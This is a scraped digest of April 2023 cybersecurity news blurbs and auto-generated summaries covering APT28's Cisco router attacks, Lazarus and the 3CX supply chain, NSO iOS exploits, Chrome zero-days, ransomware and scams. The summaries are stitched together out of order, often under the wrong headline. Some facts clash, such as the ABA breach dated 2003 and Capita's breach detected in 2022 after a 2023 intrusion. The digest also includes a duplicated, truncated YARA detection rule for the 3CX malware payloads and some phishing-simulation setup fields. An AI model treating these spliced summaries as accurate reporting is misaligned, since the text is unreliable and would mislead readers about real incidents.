The tools the attackers deployed on the breached environment include the Cobalt Strike pen-test suite, the AnyDesk and DameWare remote access tools, network scanning utilities, an AD database dumper, and a Kerberos credentials stealer. "US Cybersecurity and Infrastructure Security Agency (CISA) added MinIO, PaperCut, and Chrome vulnerabilities to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following three new issues to its Known Exploited Vulnerabilities Catalog: According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have […]
The post CISA adds MinIO, PaperCut, and Chrome bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
"Fraudsters are taking advantage of the widening fraud knowledge gap, outlining the urgent need for banks to educate and protect their customers with technology, according to Feedzai. The report reveals that while 56% of respondents have been a victim of a financial scam, many still lack the knowledge to detect and distinguish between the various types of financial crime. Consumers demand accountability Consequently, many consumers believe the responsibility for reimbursement lies with their bank, with … More
The post Scammers using social media to dupe people into becoming money mules appeared first on Help Net Security.
"Autosummary:
“With a surge in digital banking services, a willingness among customers to switch banks, and an ongoing cost of living crisis, it is more important than ever for banks to foster strong relationships with their customers and establish trust. "Sotero has launched Sotero Ransomware Protection, giving organizations the ability to proactively protect unstructured data from attack by utilizing behavior-based detection. Most currently available ransomware solutions use a signature-based approach that detects only currently known ransomware strains – a method that broadly protects against malware concerns, but does not guarantee protection against zero-day attacks. Sotero’s Ransomware Protection not only detects currently known ransomware, but also provides the ability to detect and protect data from zero-day … More
The post Sotero Ransomware Protection encrypts data to prevent theft and extortion appeared first on Help Net Security.
"Autosummary:
"Bugcrowd has released new capabilities in its Penetration Testing as a Service (PTaaS) offering that enables buyers to purchase, set up, and manage pen tests directly online without a need for lengthy sales calls and scoping sessions. PTaaS is one of several solutions delivered on the Bugcrowd Security Knowledge Platform. Legacy pen test solutions are slow, nontransparent, and low impact, and other PTaaS providers deliver what are often shallow vulnerability assessments–with neither offering access to … More
The post Bugcrowd’s new self-serve PTaaS enable buyers to manage pen tests directly online appeared first on Help Net Security.
"Autosummary:
"Phishing attacks are a major threat to organizations, they remain a perennial choice of cybercriminals when it comes to hacking their victims. Original post at hxxps://cybernews.com/security/phishing-intro-to-build-resiliency/ While organizations must still account for flashy vulnerability exploitations, denial-of-service campaigns, or movie-themed cyber-heists, phishing-based social engineering attacks remain a perennial choice of cybercriminals when it comes to hacking […]
The post Intro to phishing: simulating attacks to build resiliency appeared first on Security Affairs.
"Autosummary:
An organization’s access controls and security tools (for example, secure email gateways, network filtering mechanisms, SIEM, and so on) do not guarantee relative safety either, as several classes of social engineering platforms, reverse proxies, or man-in-the-middle (MitM) frameworks are fully capable of nullifying multifactor authentication (MFA) and other traditional security protections. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, phishing) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On #1- Sending Profile: #2 – Users & Groups: ✔️ Name – Any name works ✔️ Interface Type – SMTP ✔️ SMTP From: The email account the campaign sends emails as ✔️ Host – The server sending the emails (smtp.gmail.com, etc.) Original post at https://cybernews.com/security/phishing-intro-to-build-resiliency/ While organizations must still account for flashy vulnerability exploitations, denial-of-service campaigns, or movie-themed cyber-heists, phishing-based social engineering attacks remain a perennial choice of cybercriminals when it comes to hacking their victims. Fresh tactics Cybercriminals employ a blend of focused and indirect phishing methods to lure unsuspecting victims, which include targeted attacks crafted towards specific individuals or departments (spear phishing), attacks focused exclusively on high-value targets like business executives (whaling), or even tax-related schemes. "Autosummary:
Thursday night, the ABA began notifying members that a hacker was detected on its network on March 17th, 2003, and may have gained access to members" login credentials for a legacy member system decommissioned in 2018. "Cisco released security updates to address critical security flaws in its Industrial Network Director and Modeling Labs solutions. Cisco released security updates to address critical security vulnerabilities in the Industrial Network Director and Modeling Labs solutions. An attacker can exploit these vulnerabilities to inject arbitrary operating system commands or access sensitive data. One of the […]
The post Cisco fixed critical flaws in the Industrial Network Director and Modeling Labs solutions appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISCO) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Next, the attacker created a "ServiceAccount", "kube-controller" in the "kube-system" namespace. "The American Bar Association (ABA) disclosed a data breach, threat actors gained access to older credentials for 1,466,000 members. The American Bar Association (ABA) is a voluntary bar association of lawyers and law students; it is not specific to any jurisdiction in the United States. The ABA has 166,000 members as of 2022. The attackers may have […]
The post American Bar Association (ABA) suffered a data breach,1.4 million members impacted appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include @billtoulas, @fwosar, @BleepinComputer, @LawrenceAbrams, @Ionut_Ilascu, @serghei, @demonslay335, @jorntvdw, @malwrhunterteam, @Seifreed, @AShukuhi, @patrickwardle, @Kostastsale, @BlackBerry, @TrendMicro, @WhichbufferArda, @NCCGroupplc, @BroadcomSW, @IBMSecurity, @AhnLab_man, @SophosXOps, @SentinelOne, @pcrisk, @AlvieriD, @BrettCallow, and @siri_urz. Some interesting research on ransomware was also released this week, including: Finally, we learned about some ransomware attacks, with an NCR outage confirmed to be ransomware and Capita confirming that data was stolen in a cyberattack. "Categories: News Tags: chrome Tags: browser Tags: update Tags: vulnerability Tags: CVE Tags: exploit Tags: exploitation Tags: zero-day Users of Chrome should ensure they"re running the latest version to patch an integer overflow in the Skia graphics library. |
The post Update now, there"s a Chrome zero-day in the wild appeared first on Malwarebytes Labs.
"Autosummary:
If the number is used to set the length of a data buffer (an area of memory used to hold data), an integer overflow can lead to a buffer overflow, a vulnerability that allows an attacker to overloaded a buffer with more data than it"s expecting, which creates a route for the attacker to manipulate the program. "Categories: Apple Categories: Exploits and vulnerabilities Categories: News Tags: Apple Tags: Lockdown Mode Tags: NSO Tags: PWNYOURHOME Tags: FINDMYPWN Tags: LATENTIMAGE Apple"s Lockdown Mode has shown that it can do what it was designed to do by notifying users about an NSO exploit. |
The post iOS Lockdown Mode effective against NSO zero-click exploit appeared first on Malwarebytes Labs.
"Autosummary:
To exclude an app or edit your excluded websites: Open the Settings app app Tap Privacy & Security Under Security , tap Lockdown Mode , tap Tap Configure Web Browsing Exclude websites or apps from Lockdown Mode on iPhone To exclude an app, turn that app off in the menu. How to enable Lockdown Mode on iPhone or iPad: Open the Settings app app Tap Privacy & Security Under Security , tap Lockdown Mode and tap Turn On Lockdown Mode , tap and tap Tap Turn On Lockdown Mode Tap Turn On & Restart, then enter your device passcode. Pegasus spyware, developed by NSO Group, has featured in many news stories, after being found to have been used against journalists, politicians, State Department employees, embassy workers, and activists. "A recent Code42 report reveals a rapidly growing number of inside risk incidents and a concerning lack of training and technology, further exacerbated by increasing workforce turnover and cloud adoption. In this Help Net Security video, Joe Payne, President at CEO at Code42, discusses how data loss from insiders is not a new problem but has become more complex.
The post How companies are struggling to build and run effective cybersecurity programs appeared first on Help Net Security.
"Autosummary:
"Organizations experienced a significant increase in ransomware – from an average of four attacks over five years in 2021 versus four attacks over the course of one year in 2022, according to ExtraHop. Of those who fell victim, 83% admitted to paying the ransom at least once. As organizations increasingly find themselves under attack, the data discovered they are drowning in cybersecurity debt – unaddressed security vulnerabilities like unpatched software, unmanaged devices, shadow IT, and … More
The post Outdated cybersecurity practices leave door open for criminals appeared first on Help Net Security.
"Autosummary:
"Threat actors are hacking poorly secured and Interned-exposed Microsoft SQL servers to deploy the Trigona ransomware. Threat actors are hacking into poorly secured and public-facing Microsoft SQL servers to deploy Trigona ransomware. Trigona is a malware strain that was discovered in October 2022, and Palo Alto Unit 42 researchers reported similarities between Trigona and the […]
The post Trigona Ransomware targets Microsoft SQL servers appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Microsoft SQL, Trigona ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
According to the latest update, the initial unauthorized access to Capita"s systems occurred on March 22, 2023, and remained uninterrupted until the firm realized the breach on March 31, 2022. "Autosummary:
"Autosummary:
Operation Dream Job, also known as DeathNote or NukeSped, refers to multiple attack waves wherein the group leverages fraudulent job offers as a lure to trick unsuspecting targets into downloading malware. "Autosummary:
" The threat actor further abused the flaw to deploy two additional tools, dubbed "Netcat" and "Errors.jsp," between January 28, 2023 and January 31, 2023, although not every installation attempt is said to have been successful. "Autosummary:
The threat actor subsequently moves to set up persistence on the victim system by creating a local account and deploys the MgBot modular framework, which comes with a wide range of plugins to harvest browser data, log keystrokes, capture screenshots, record audio, and enumerate the Active Directory service. "Autosummary:
NSO Group is the manufacturer of Pegasus, a sophisticated cyber weapon that"s capable of extracting sensitive information stored in a device – e.g., messages, locations, photos, and call logs, among others — in real-time. This entailed the use of three disparate exploit chains dubbed LATENTIMAGE, FINDMYPWN, and PWNYOURHOME that weaponized various flaws in iOS 15 and iOS 16 as zero-days to penetrate the devices and ultimately launch Pegasus - LATENTIMAGE (iOS version 15.1.1, detected in January 2022) - "Autosummary:
"Autosummary:
"Autosummary:
"Taking a look at the three 32-bit integers, 0xC2B45678, 0x90ABCDEF, and 0xFE268455 from Figure 5, which represent a key for a custom implementation of the A5/1 cipher, we realized that the same algorithm and the identical keys were used in Windows malware that dates back to the end of 2014 and was involved in one of the most notorious Lazarus cases: the cybersabotage of Sony Pictures Entertainment," explained ESET." Also, ESET found an earlier variant of the SimplexTea malware on VirusTotal, named "sysnetd," which is also similar to the mentioned backdoors but written in C. Domains used for fake TLS connections (left - BadCall, right - sysnetd) (ESET) "Autosummary:
"Autosummary:
"Autosummary:
Phishing page where victims land after an XSS redirection (Google) This week, a joint announcement by the UK NCSC, FBI, NSA, and CISA warned that APT28 is hacking Cisco Routers to install custom malware. "North Korea-linked APT group Lazarus employed new Linux malware in attacks that are part of Operation Dream Job. North Korea-linked APT group Lazarus is behind a new campaign tracked as Operation DreamJob (aka DeathNote or NukeSped) that employed Linux malware. The threat actors were observed using social engineering techniques to compromise its targets, with fake job offers […]
The post Lazarus APT group employed Linux Malware in recent attacks and was linked to 3CX supply chain attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Lazarus) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Tags: ftc Tags: tech support scam Tags: scammers Tags: payment processor Tags: fine Tags: visa Tags: chargeback We take a look at a story involving the FTC going head to head with a payment processor caught up in tech support scam allegations. |
The post FTC tackles tech support scams by chasing payment processor firms appeared first on Malwarebytes Labs.
"Autosummary:
The February 10, 2017 email included a table showing Tech Live Connect had (1) chargeback rates of 2.2% in November 2016, 2.6% in December 2016, and 1.5% in January 2017; and (2) cancelation rates of 23.2% in November 2016, 27% in December 2016, and 21.8% in January 2017. From the FTC release: The Federal Trade Commission has acted to stop Nexway, a multinational payment processing company, along with its CEO and chief strategy officer, from serving as a facilitator for the tech support scammers through credit card laundering. For a very detailed breakdown of tech support scams, how they operate, and more suggestions to keep yourself safe from harm, please check out our dedicated tech support scams page. "Categories: Exploits and vulnerabilities Categories: News Tags: APT28 Tags: Sofacy Tags: Fancy Bear Tags: GRU Tags: Cisco Tags: CVE--2017-6742 Tags: SNMP Tags: Jaguar Tooth A joint advisory about a Cisco vulnerability by several US and UK agencies gives us a peek inside the minds of ideologically motivated cybercriminals |
The post Fancy Bear known to be exploiting vulnerability in Cisco routers appeared first on Malwarebytes Labs.
"Autosummary:
Posted: April 20, 2023 by A joint advisory about a Cisco vulnerability by several US and UK agencies gives us a peek inside the minds of ideologically motivated cybercriminals In a joint advisory, the UK National Cyber Security Centre (NCSC), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released information about APT28’s exploitation of Cisco routers in 2021.SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be abused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network. "ICICI Bank leaked millions of records with sensitive data, including financial information and personal documents of the bank’s clients. In 2022, the ICICI Bank’s resources were named a “critical information infrastructure” by the Indian government – any harm to it can impact national security. However, despite the critical status of bank infrastructure on the national […]
The post Multinational ICICI Bank leaks passports and credit card numbers appeared first on Security Affairs.
"Autosummary:
Among the leaked data were bank account details, bank statements, credit card numbers, full names, dates of birth, home addresses, phone numbers, emails, personal identification documents, and employees’ and candidates’ CVs. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ICICI Bank) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Similarities with newly discovered Linux malware used in Operation DreamJob corroborate the theory that the infamous North Korea-aligned group is behind the 3CX supply-chain attack
The post Linux malware strengthens links between Lazarus and the 3CX supply‑chain attack appeared first on WeLiveSecurity
"Autosummary:
Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12" author = "ESET Research" date = "2023-03-31" hash = "3B88CDA62CDD918B62EF5AA8C5A73A46F176D18B" hash = "CAD1120D91B812ACAFEF7175F949DD1B09C6C21A" hash = "5B03294B72C0CAA5FB20E7817002C600645EB475" hash = "7491BD61ED15298CE5EE5FFD01C8C82A2CDB40EC" condition: pe.rich_signature.toolid(259, 30818) == 9 and pe.rich_signature.toolid(256, 31329) == 1 and pe.rich_signature.toolid(261, 30818) >= 30 and pe.rich_signature.toolid(261, 30818) <= 38 and pe.rich_signature.toolid(261, 29395) >=Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12" author = "ESET Research" date = "2023-03-31" hash = "3B88CDA62CDD918B62EF5AA8C5A73A46F176D18B" hash = "CAD1120D91B812ACAFEF7175F949DD1B09C6C21A" hash = "5B03294B72C0CAA5FB20E7817002C600645EB475" hash = "7491BD61ED15298CE5EE5FFD01C8C82A2CDB40EC" condition: pe.rich_signature.toolid(259, 30818) == 9 and pe.rich_signature.toolid(256, 31329) == 1 and pe.rich_signature.toolid(261, 30818) >= 30 and pe.rich_signature.toolid(261, 30818) <= 38 and pe.rich_signature.toolid(261, 29395) >=RecvMsg CHttpWrapper:: SendMsg (_MSG_STRUCT *) SendMsg CHttpWrapper::SendData(uchar *,uint,uint) CHttpWrapper::SendMsg(uint,uint,uchar *,uint,uint) CHttpWrapper::SendLoginData(uchar *,uint,uchar *&,uint *) How is sysnetd related to Lazarus?C MsgRun ::Start(void) MSG_Run C MsgSetPath ::Start(void) MSG_SetPath C MsgSleep ::Start(void) MSG_Sleep C MsgTest ::Start(void) MSG_Test C MsgUp ::Start(void) MSG_Up C MsgWriteConfig ::Start(void) MSG_WriteConfig MSG_GetComInfo CMsgHibernate::Start(void) CMsgKeepCon::Start(void) CMsgZipDown::Start(void) CMsgZip::StartZip(void *) CMsgZip::Start(void) CHttpWrapper::RecvData(uchar *&,uint *,uint,signed char)No hashes were provided, but Mandiant’s YARA rule, named TAXHAUL, also triggers on other samples already on VirusTotal: SHA-1: 2ACC6F1D4656978F4D503929B8C804530D7E7CF6 ( ualapi.dll ), ( ), SHA-1: DCEF83D8EE080B54DC54759C59F955E73D67AA65 ( wlbsctrl.dll ) The filenames, but not MD5s, of these samples coincide with those from Kaspersky’s blogpost.Comparison of the original symbol names from two Linux backdoors submitted to VirusTotal guiconfigd (SimplexTea for Linux, from Georgia) sysnetd (BADCALL for Linux, from Romania) C MsgCmd ::Start(void) MSG_Cmd C Msg Secure Del ::Start(void) MSG_Del C MsgDir ::Start(void) MSG_Dir C MsgDown ::Start(void) MSG_Down C MsgExit ::Start(void) MSG_Exit C MsgReadConfig ::Start(void) MSG_ReadConfig Taking a look at the three 32-bit integers, 0xC2B45678, 0x90ABCDEF, and 0xFE268455 from Figure 5, which represent a key for a custom implementation of the A5/1 cipher, we realized that the same algorithm and the identical keys were used in Windows malware that dates back to the end of 2014 and was involved in one of the most notorious Lazarus cases: the cybersabotage of Sony Pictures Entertainment (SHA-1: 1C66E67A8531E3FF1C64AE57E6EDFDE7BEF2352D).Because of the seriousness of the incident, multiple security companies started to contribute their summaries of the events, namely Sophos, Check Point, Broadcom, Trend Micro, and more. On April 3rd, Kaspersky, through its telemetry, showed a direct relationship between the 3CX supply-chain victims and the deployment of a backdoor dubbed Gopuram, both involving payloads with a common name, guard64.dll.Initially reported on March 29th, 2023 in a Reddit thread by a CrowdStrike engineer, followed by an official report by CrowdStrike, stating with high confidence that LABIRINTH CHOLLIMA, the company’s codename for Lazarus, was behind the attack (but omitting any evidence backing up the claim). "As cyberattacks increase in frequency and sophistication, small and medium-sized businesses (SMBs) become more vulnerable to cyber threats. Unlike larger enterprises, SMBs often lack the financial and technical resources to secure their networks and data against malicious actors effectively. With limited budgets and IT staff, many small companies are forced to make difficult decisions about where to allocate their resources. Fortunately, several free online cybersecurity resources can help small businesses protect themselves from cyber attacks. … More
The post 5 free online cybersecurity resources for small businesses appeared first on Help Net Security.
"Autosummary:
Cyber Readiness Program The Cyber Readiness Program is a free resource that helps small and medium-sized enterprises become cyber-ready, improving their resilience to cyber threats. "Destructive ransomware attacks impact enterprises, governments, airlines, hospitals, hotels, and individuals, causing widespread system downtime, economic loss, and reputational damage. In this Help Net Security video, AnnMarie Nayiga, Lead MDR Analyst at Malwarebytes, talks about the dangers of ransomware reinfection.
The post Ransomware reinfection and its impact on businesses appeared first on Help Net Security.
"Autosummary:
"With cybersecurity teams struggling to manage the remediation process and monitor for vulnerabilities, organizations are at a higher risk for security breaches, according to Cobalt. As enterprises prioritize efficiencies, security leaders increasingly turn to third-party vendors to alleviate the pressures of consistent testing and to fill in talent gaps. The report identifies how macroeconomic shifts are affecting organizations’ security standards across the U.S. and EMEA, revealing how security teams can extract more value from their … More
The post Tight budgets and burnout push enterprises to outsource cybersecurity appeared first on Help Net Security.
"Autosummary:
Other vulnerabilities spanned across Cross-Site Scripting (12%), Sensitive Data Exposure (10%), Broken Access Control (10%) and Authentication & Sessions (9%). "Phylum has added Open Policy Agent (OPA) and continuous reporting to its policy engine. Customers now have more flexibility when creating and enforcing custom policies, and can show compliance with key software supply chain frameworks, regulations and guidelines. “We built Phylum’s policy engine as a security-as-code mechanism to give security and risk teams more visibility into the development lifecycle and allow them to enforce security policy without disruption. Phylum is the only platform that allows … More
The post Phylum adds OPA and continuous reporting to its policy engine appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Drokbk was previously detailed by Secureworks Counter Threat Unit (CTU) in December 2022, attributing it to a threat actor known as Nemesis Kitten (aka Cobalt Mirage, TunnelVision, or UNC2448), a sub-cluster of Mint Sandstorm. "Citizen Lab reported that Israeli surveillance firm NSO Group used at least three iOS zero-click exploits in 2022. A new report from Citizen Lab states that the Israeli surveillance firm NSO Group used at least three zero-click zero-day exploits to deliver its Pegasus spyware. In 2022, the Citizen Lab analyzed the NSO Group activity after finding […]
The post PWNYOURHOME, FINDMYPWN, LATENTIMAGE: 3 iOS Zero-Click exploits used by NSO Group in 2022 appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Citizen Lab) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The victims include journalists, political opposition figures, and an NGO worker located in North America, Central Asia, Southeast Asia, Europe, and the Middle East. "Autosummary:
"We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven"t yet fixed" - Google Last Friday, Google released another emergency Chrome update to fix CVE-2023-2033, the first actively exploited vulnerability in the browser discovered in 2023. "Autosummary:
"Autosummary:
Most targeted sectors by ransomware actors (NCC Group) In second place are "Consumer Cyclicals," encompassing construction supplies, specialty retailers, hotels, automobiles, media & publishing, household goods, etc. "Autosummary:
" Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities. "Autosummary:
The activity has been attributed to a threat actor tracked as APT28, which is also known as Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, and Sofacy, and is affiliated with the Russian General Staff Main Intelligence Directorate (GRU). "Autosummary:
Larger organizations should consider taking additional, advanced actions like accelerating security improvements, reassessing risk tolerance, temporarily reducing system functionality, aggressively patching vulnerabilities, delaying non-security system changes, and preparing for extended operational hours or incident response scaling. "Autosummary:
"As of 18th April, 2023 we have evidence to suggest that unpatched servers are being exploited in the wild, (particularly ZDI-CAN-18987 / PO-1216)," reads the advisory. "Autosummary:
" The state-sponsored cyber actor, also tracked as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, is both highly active and proficient. "Autosummary:
"UK and US agencies are warning of Russia-linked APT28 group exploiting vulnerabilities in Cisco networking equipment. Russia-linked APT28 group accesses unpatched Cisco routers to deploy malware exploiting the not patched CVE-2017-6742 vulnerability (CVSS score: 8.8), states a joint report published by the UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure […]
The post US and UK agencies warn of Russia-linked APT28 exploiting Cisco router flaws appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, APT28) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Russia-linked APT28 group accesses unpatched Cisco routers to deploy malware exploiting the not patched CVE-2017-6742 vulnerability (CVSS score: 8.8), states a joint report published by the UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI). "Autosummary:
"Autosummary:
“During the investigation, we discovered the unauthorized party used CVE-2023-0669 to install up to two additional tools - “Netcat” and “Errors.jsp” - in some MFTaaS customer environments between January 28, 2023, and January 31, 2023,” explains Fortra. "Autosummary:
" AuKill timeline (Sophos X-Ops) AuKill is similar to an open-source tool called Backstab, which also uses a Process Explorer driver to disable security solutions running on compromised devices. "Russian national Denis Mihaqlovic Dubnikov has been sentenced to time served for committing money laundering for the Ryuk ransomware operation. Russian national Denis Dubnikov (30) has been sentenced to time served for committing money laundering for the Ryuk ransomware group. The man was also ordered to pay $2,000 in restitution. On February 7, 2023, Dubnikov pleaded […]
The post Russian national sentenced to time served for committing money laundering for the Ryuk ransomware operation appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Ryuk ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Google rolled out emergency security patches to address another actively exploited high-severity zero-day flaw in the Chrome browser. Google rolled out emergency fixes to address another actively exploited high-severity zero-day flaw, tracked as CVE-2023-2136, in its Chrome web browser. The vulnerability is an Integer overflow in the Skia graphics library, the issue was reported by […]
The post Google fixed the second actively exploited Chrome zero-day of 2023 appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Chrome) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Business IT security on the go. |
The post Introducing the Malwarebytes Admin app: Endpoint security at your fingertips appeared first on Malwarebytes Labs.
"Autosummary:
You can assign roles (Super Admin, Admin, Read-only), add users to existing groups, delete users, resend invites, and edit user roles or group membership. Selecting the "Actions" button lets you take various actions on the chosen endpoints, such as scanning, isolating, updating agents, checking for updates, and remediating endpoints. "Categories: News Tags: domino Tags: loader Tags: backdoor Tags: malware Tags: ransomware Tags: emotet Tags: network Tags: corporate Tags: business Tags: organisation Tags: data Tags: theft Tags: steal Tags: banking Tags: trojan We take a look at a malware collective pushing a set of Domino malware files. |
The post Malware authors join forces and target organisations with Domino Backdoor appeared first on Malwarebytes Labs.
"Autosummary:
Grabbing links from the desktop Collection of system information in HTML format Telegram sessions Collection of Discord tokens It can also be set to block startup inside of a virtual machine (often used to test malware files), lock the startup if found to be running in a CIS country, and self-delete after sending the stolen data. "Categories: News Tags: fake Tags: muse Tags: art Tags: artist Tags: instagram Tags: check Tags: payment Tags: fraud Tags: wire Tags: bank Tags: banking Tags: drawing Tags: painting We take a look at a fake check scam which plugs into the art world. |
The post Instagram scam promises money in exchange for your image appeared first on Malwarebytes Labs.
"Autosummary:
From another recent Reddit example: Someone said that they"ll want some muse for an art thing, and so she send me a check of $2500 to pay me $500 with the remaining $2000 sent to her. "Luckily" for this person, the payment amount in this example ($100 for art supplies) is not typical for this scam, and significantly lower than usual.After a few weeks, with the scammer long gone, the check will eventually bounce and you’ll absorb the cost of the remaining check money from your own finances.Posted: April 19, 2023 by We take a look at a fake check scam which plugs into the art world. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Bitwarden – Password security you can trust. "A well-tuned data breach playbook can provide security teams with a clear roadmap for working through the breach response process. Foreseeing every possible twist and turn of a breach may be impossible, but through extensive wargaming, teams can simulate diverse situations to give them a proactive edge. Building a playbook means mapping practical data breach scenarios around product security, infrastructure, corporate security, social engineering, vendor supply chain risk, and more. Security teams can approach these … More
The post Wargaming an effective data breach playbook appeared first on Help Net Security.
"Autosummary:
Depending on the conditions simulated, these playbooks can include: How to identify and attribute a data breach Identify the proximal systems in the blast radius Communicate breach status to key company stakeholders Include necessary teams such as DevOps, legal, marketing/PR, etc. Determine remediation efforts needed (e.g., breach location quarantine, patching) and assign responsible team members Decide when and how to notify impacted individuals and government entities Plan when and how to release a public statement The completed playbooks should be distributed to all necessary stakeholders across the company to break down silos, generate buy-in, and ensure everyone is united in their approach. "In today’s rapidly evolving technological landscape, it’s more important than ever for Boards and executives to stay informed about the latest advancements and potential risks in technology and digital capability. In this Help Net Security interview, Alicja Cade, Director, Financial Services, Office of the CISO, Google Cloud, offers insights on how asking the right questions can help improve cyber performance and readiness, advance responsible AI practices, and balance the need for cybersecurity with other business … More
The post Balancing cybersecurity with business priorities: Advice for Boards appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Alicja Cade, Director, Financial Services, Office of the CISO, Google Cloud, offers insights on how asking the right questions can help improve cyber performance and readiness, advance responsible AI practices, and balance the need for cybersecurity with other business priorities. To maximize the benefits of AI technologies and minimize risks, we recommend that Boards work with the CISO to take a three-pronged approach to secure, scale, and evolve – deploy secure AI systems, leverage the power of AI to achieve better cybersecurity outcomes at scale, and stay informed on developments in this space to anticipate threats. To better balance the scale, Boards must encourage deeper collaboration between the C-Suite – especially the Chief Information Security Officer, Chief Information Officer, Chief Technology Officer, and Chief Compliance Officer as well as business leaders – to build better security into all products and services versus security being an add-on. "Autosummary:
Wardle also pointed out additional safeguards implemented by Apple, such as System Integrity Protection (SIP) and Transparency, Consent, and Control (TCC) that prevent the execution of unauthorized code and require apps to seek users" permission to access protected files and data. "Autosummary:
롯데시네마 지니뮤직 - genie 컬쳐랜드[컬쳐캐쉬] GOM Player 메가박스 (removed), and LIVE Score, Real-Time Score The findings highlight the need for app developers to be transparent about the dependencies used in their software, not to mention take adequate steps to safeguard users" information against such abuse. "A new malware, dubbed Domino, developed by the FIN7 cybercrime group has been used by the now-defunct Conti ransomware gang. IBM Security X-Force researchers recently discovered a new malware family, called Domino, which was created by developers associated with the FIN7 cybercriminal group (tracked by X-Force as ITG14). FIN7 is a Russian criminal group (aka Carbanak) that has […]
The post The intricate relationships between the FIN7 group and members of the Conti ransomware gang appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, FIN7) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Most of the losses concern investment scams, which accounted for $1.5 billion, followed by remote access scams that resulted in losses of $229 million, and payment redirection scams that cost victims another $224 million. "Autosummary:
PoC released by the researcher (GitHub) All users, package maintainers, and software developers whose projects incorporate the VM2 library are recommended to upgrade to version 3.9.17, which addresses the security flaw, as soon as possible. "Korea Trade-Investment Promotion Agency (KOTRA) will host 10 Korean cybersecurity companies as Korea Pavilion with Korea Information Security Industry Association (KISIA) at RSA Conference 2023. KOTRA and KISIA will feature companies from across a range of fields including network security, cloud security, identity and access management and more. Additionally, KOTRA and KISIA will hold a networking event with including Korean cybersecurity companies, local investors, and invited Korea Pavilion attendees from RSAC 2023 on the last … More
The post KOTRA and KISIA will showcase 10 Korean cybersecurity companies at RSA Conference 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Those with the lowest detection rate on VirusTotal are compiled using "BCC64.exe," a new Clang based C++ compiler from Embarcadero," the Israeli cybersecurity company said, pointing out its ability to evade sandboxes and virtual machines. "US Cybersecurity and Infrastructure Security Agency (CISA) added Chrome and macOS vulnerabilities to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to […]
The post CISA adds bugs in Chrome and macOS to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" Microsoft recommends using attack surface reduction rules to block executables that do not meet specific criteria: Block executable files from running unless they meet a prevalence, age, or trusted list criterion Block Office applications from creating executable content Block process creations originating from PSExec and WMI commands As the threat actors heavily rely on vulnerabilities for initial access to corporate networks, Microsoft recommends that organizations apply security updates as soon as possible. "Autosummary:
